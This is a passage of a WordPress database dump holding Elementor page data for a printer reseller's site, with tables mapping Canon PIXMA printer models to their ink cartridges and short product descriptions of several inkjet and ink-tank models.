width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6918,3301,'_elementor_version','2.5.14'),(6921,3302,'_wp_page_template','template-fullwidth.php'),(6922,3302,'_elementor_edit_mode','builder'),(6923,3302,'_elementor_template_type','post'),(6924,3302,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"46\",\"right\":\"46\",\"bottom\":\"46\",\"left\":\"46\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"36\",\"right\":\"36\",\"bottom\":\"36\",\"left\":\"36\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black 